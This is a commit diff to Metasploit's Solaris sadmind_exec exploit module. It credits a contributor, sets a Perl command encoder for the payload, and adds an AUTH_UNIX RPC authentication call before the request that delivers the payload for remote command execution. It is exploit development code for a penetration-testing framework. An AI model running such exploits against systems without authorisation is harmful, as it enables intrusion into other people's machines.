Land rapid7#3518, @midnitesnake's fix for solaris sadmind_exec

Author: jvazquez-r7

modules/exploits/solaris/sunrpc/sadmind_exec.rb

@@ -21,7 +21,7 @@ def initialize(info = {})
 
         Vulnerable systems include solaris 2.7, 8, and 9
       },
-      'Author'         => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz' ],
+      'Author'         => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
@@ -35,9 +35,10 @@ def initialize(info = {})
       'Arch'           => ARCH_CMD,
       'Payload'        =>
         {
-          'Space'    => 2000,
-          'BadChars' => "\x00",
+          'Space'       => 2000,
+          'BadChars'    => "\x00",
           'DisableNops' => true,
+          'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
@@ -83,6 +84,7 @@ def exploit
       hostname = datastore['HOSTNAME']
     end
 
+    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
     response = sadmind_request(hostname, payload.encoded)
     sunrpc_destroy